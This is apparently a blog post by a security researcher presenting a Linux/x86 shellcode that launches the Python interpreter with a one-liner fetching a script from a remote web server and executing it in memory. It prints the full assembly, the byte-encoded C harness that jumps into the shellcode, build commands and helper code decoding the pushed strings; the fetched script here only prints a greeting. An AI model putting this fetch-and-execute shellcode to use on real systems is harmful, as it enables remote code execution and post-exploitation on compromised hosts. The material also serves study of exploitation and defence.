Several years ago I developed and released a program in Python called shcfuscator (read: shellcode obfuscator) to automate this very process.
Shcfuscator takes an input assembly program in GAS syntax, substitutes popular instructions, and outputs an assembly program in GAS syntax.
Nothing much happened with it, and I didn't follow-up on it, until recently, when I thought about it again and decided to write this post.

So, if anybody is interested in porting it to Metasploit as an encoder module, please let me know - I'd be happy to help out!

Following this legacy project, I have decided to open a repository for other legacy projects that I developed in the early to mid 2000s.

The repository can be found at: https://github.com/ikotler/tty64

I am not planning to maintain it, but nonetheless feel free to fork.

Thursday, May 17, 2012

Linux/x86 Execve Python Interpreter with a Python Program Passed in as String Shellcode

About a month ago, Phrack magazine #68 was released and a linux x86 shellcode (bindshell-tcp-fork.s) that I wrote a few years ago got mentioned in one of the articles.
This made me feel nostalgic and I have decided to pack all the shellcodes that I have written over the years into a tarball (linux_x86_shellcodes.tar.gz) and re-publish it.
The feedback I got was great, and it inspired me to go and write a new shellcode. So, I did.
I have written a new linux x86 execve() shellcode that executes the Python interpreter with a Python program passed in as string.

Why call Python and not /bin/sh, you ask? Because a Python script makes it easier to customize and/or automate penetration testing (especially post-exploitation).
Python is a cross-platform programming language with a decent standard library, and is known to run on almost any operating system or hardware platform.
A Python script can query the OS, CPU, HOSTNAME, and even IP address, and based on this information call different functions and/or use different parameters.
A shell script, as good as it may be, still depends on various binaries being installed beforehand in order to run successfully. Also, shell scripts are not cross-platform.

Let's have a look at how it works. Here's the shellcode source code:
.section .text
.global _start
_start:
        push  $0xb
        pop   %eax
        cdq
        push  %edx
        push  $0x20292763
        push  $0x65786527
        push  $0x2c273e67
        push  $0x6e697274
        push  $0x733c272c
        push  $0x29286461
        push  $0x65722e29
        push  $0x2779702e
        push  $0x646c726f
        push  $0x776f6c6c
        push  $0x65682f32
        push  $0x34323834
        push  $0x3639322f
        push  $0x752f6d6f
        push  $0x632e786f
        push  $0x62706f72
        push  $0x642e6c64
        push  $0x2f2f3a70
        push  $0x74746827
        push  $0x286e6570
        push  $0x6f6c7275
        push  $0x2e326269
        push  $0x6c6c7275
        push  $0x28656c69
        push  $0x706d6f63
        push  $0x20636578
        push  $0x653b3262
        push  $0x696c6c72
        push  $0x75207472
        push  $0x6f706d69
        mov   %esp, %esi
        push  %edx
        pushw $0x632d
        mov   %esp, %ecx
        push  %edx
        push  $0x6e6f6874
        push  $0x79702f6e
        push  $0x69622f72
        push  $0x73752f2f
        mov   %esp,%ebx
        push  %edx
        push  %esi
        push  %ecx
        push  %ebx
        mov   %esp,%ecx
        int   $0x80
What the shellcode does is call execve() syscall with '/usr/bin/python' as the filename argument, and '-c' and a one-line Python program as the argv array argument.
There's no need for a cleanup code, as execve() does not return on success, and the text, data, bss, and stack of the calling process are overwritten by that of the program loaded.
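
The long runs of push instructions are simply strings cut into 4-byte little-endian pieces and pushed back to front. A small Python 3 sketch makes the mapping visible; pushes_to_bytes and bytes_to_pushes are hypothetical helper names, and the second one assumes the string length is a multiple of 4.

```python
import struct


def pushes_to_bytes(pushed):
    """Rebuild the in-memory string from dwords listed in push order."""
    # The stack grows downward, so the last value pushed sits at the lowest
    # address; x86 stores each dword little-endian.
    return b''.join(struct.pack('<I', value) for value in reversed(pushed))


def bytes_to_pushes(text):
    """Split a string (length a multiple of 4) into dwords in push order."""
    words = [struct.unpack('<I', text[i:i + 4])[0] for i in range(0, len(text), 4)]
    return list(reversed(words))


# The four dwords pushed before `mov %esp,%ebx` in the listing above.
filename = [0x6e6f6874, 0x79702f6e, 0x69622f72, 0x73752f2f]
print(pushes_to_bytes(filename))
print([hex(word) for word in bytes_to_pushes(b'//usr/bin/python')])
```

The doubled leading slash pads the path to 16 bytes, a multiple of 4, without changing which file it names.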

Here is the Python one-line program source code:
import urllib2 ; exec compile(urllib2.urlopen('http://ikotler.org/helloworld.py').read(), '<string>', 'exec')
What the Python program does is import the urllib2 library and use it to retrieve a Python script from a remote Web server, and then compiles and executes it on the fly.
Moreover, the retrieved Python script remains in memory the whole time. The Python program does all of the above without writing any data to the hard drive.

Here is the retrieved Python script (i.e. helloworld.py) source code:
print "Hello, world"
Depending on the nature of the retrieved Python script, it might be enough to just use eval() instead of the exec and compile() combination in the one-line Python program.
In this case, however, print is a statement in Python 2.x and as such it cannot be evaluated using eval(). In Python 3, print() is a function and can be evaluated using eval().
If in doubt, always use the exec and compile() combination.
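A quick way to see the difference is to ask compile() whether a piece of source is acceptable in 'eval' mode, which only takes a single expression. The sketch below assumes Python 3, and can_eval is a hypothetical helper name; it compiles the source but never runs it.

```python
def can_eval(source):
    """Return True if `source` is a single expression that eval() would accept."""
    try:
        compile(source, "<string>", "eval")
        return True
    except SyntaxError:
        # Statements such as assignments or imports are rejected in 'eval' mode.
        return False

print(can_eval("1 + 1"))                   # prints True
print(can_eval("print('Hello, world')"))   # prints True (a function call in Python 3)
print(can_eval("import os"))               # prints False
print(can_eval("x = 1"))                   # prints False
```

Anything for which this returns False needs the exec and compile() combination.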

To compile the shellcode source and test it:
$ as -o python-execve-urllib2-exec.o python-execve-urllib2-exec.s
$ ld -o python-execve-urllib2-exec python-execve-urllib2-exec.o
$ ./python-execve-urllib2-exec
The output should be:
Hello, world
Here is the shellcode represented as a hex string within a C program:
char shellcode[] =

        "\x6a\x0b"              // push  $0xb
        "\x58"                  // pop   %eax
        "\x99"                  // cdq
        "\x52"                  // push  %edx
        "\x68\x63\x27\x29\x20"  // push  $0x20292763
        "\x68\x27\x65\x78\x65"  // push  $0x65786527
        "\x68\x67\x3e\x27\x2c"  // push  $0x2c273e67
        "\x68\x74\x72\x69\x6e"  // push  $0x6e697274
        "\x68\x2c\x27\x3c\x73"  // push  $0x733c272c
        "\x68\x61\x64\x28\x29"  // push  $0x29286461
        "\x68\x29\x2e\x72\x65"  // push  $0x65722e29
        "\x68\x2e\x70\x79\x27"  // push  $0x2779702e
        "\x68\x6f\x72\x6c\x64"  // push  $0x646c726f
        "\x68\x6c\x6c\x6f\x77"  // push  $0x776f6c6c
        "\x68\x32\x2f\x68\x65"  // push  $0x65682f32
        "\x68\x34\x38\x32\x34"  // push  $0x34323834
        "\x68\x2f\x32\x39\x36"  // push  $0x3639322f
        "\x68\x6f\x6d\x2f\x75"  // push  $0x752f6d6f
        "\x68\x6f\x78\x2e\x63"  // push  $0x632e786f
        "\x68\x72\x6f\x70\x62"  // push  $0x62706f72
        "\x68\x64\x6c\x2e\x64"  // push  $0x642e6c64
        "\x68\x70\x3a\x2f\x2f"  // push  $0x2f2f3a70
        "\x68\x27\x68\x74\x74"  // push  $0x74746827
        "\x68\x70\x65\x6e\x28"  // push  $0x286e6570
        "\x68\x75\x72\x6c\x6f"  // push  $0x6f6c7275
        "\x68\x69\x62\x32\x2e"  // push  $0x2e326269
        "\x68\x75\x72\x6c\x6c"  // push  $0x6c6c7275
        "\x68\x69\x6c\x65\x28"  // push  $0x28656c69
        "\x68\x63\x6f\x6d\x70"  // push  $0x706d6f63
        "\x68\x78\x65\x63\x20"  // push  $0x20636578
        "\x68\x62\x32\x3b\x65"  // push  $0x653b3262
        "\x68\x72\x6c\x6c\x69"  // push  $0x696c6c72
        "\x68\x72\x74\x20\x75"  // push  $0x75207472
        "\x68\x69\x6d\x70\x6f"  // push  $0x6f706d69
        "\x89\xe6"              // mov   %esp,%esi
        "\x52"                  // push  %edx
        "\x66\x68\x2d\x63"      // pushw $0x632d
        "\x89\xe1"              // mov   %esp,%ecx
        "\x52"                  // push  %edx
        "\x68\x74\x68\x6f\x6e"  // push  $0x6e6f6874
        "\x68\x6e\x2f\x70\x79"  // push  $0x79702f6e
        "\x68\x72\x2f\x62\x69"  // push  $0x69622f72
        "\x68\x2f\x2f\x75\x73"  // push  $0x73752f2f
        "\x89\xe3"              // mov   %esp,%ebx
        "\x52"                  // push  %edx
        "\x56"                  // push  %esi
        "\x51"                  // push  %ecx
        "\x53"                  // push  %ebx
        "\x89\xe1"              // mov   %esp, %ecx
        "\xcd\x80";             // int   $0x80

int main(int argc, char **argv) {
        int *ret;
        ret = (int *)&ret + 2;
        (*ret) = (int) shellcode;
}
Again, to run and test it is as easy as:
$ gcc -o python-execve-urllib2-exec python-execve-urllib2-exec.c
$ ./python-execve-urllib2-exec 
The output should be the same:
Hello, world
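The hex-string form used in the C program can be cross-checked against the assembly by hand or mechanically. Here is a minimal sketch, assuming Python 3 and using the hypothetical helper names push_imm32 and to_c_literal, that encodes a single 32-bit push (opcode 0x68 followed by the immediate in little-endian order) and prints it the way it appears in the listing.

```python
import struct

def push_imm32(value):
    """Encode the x86 `push imm32` instruction: opcode 0x68 plus a little-endian dword."""
    return b"\x68" + struct.pack("<I", value)

def to_c_literal(raw):
    """Format raw bytes as a C string literal made of hex escapes."""
    return '"' + "".join("\\x%02x" % byte for byte in raw) + '"'

# The push that carries the 'ib2.' part of the one-liner.
print(to_c_literal(push_imm32(0x2e326269)))  # prints "\x68\x69\x62\x32\x2e"
```

Comparing this output line by line with the C array is an easy way to catch a comment that has drifted away from the bytes next to it.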
Now, I have also decided to open a GitHub repository to host the collection of shellcodes that I have written in the past, as well as any that I may write in the future.
I have committed both the .s and .c versions of this shellcode to it, as well as the rest of the shellcodes from the tarball.

The repository can be found at: https://github.com/ikotler/shellcode

Feel free to fork it and, if you wish, submit a pull request to fix a bug or suggest a change.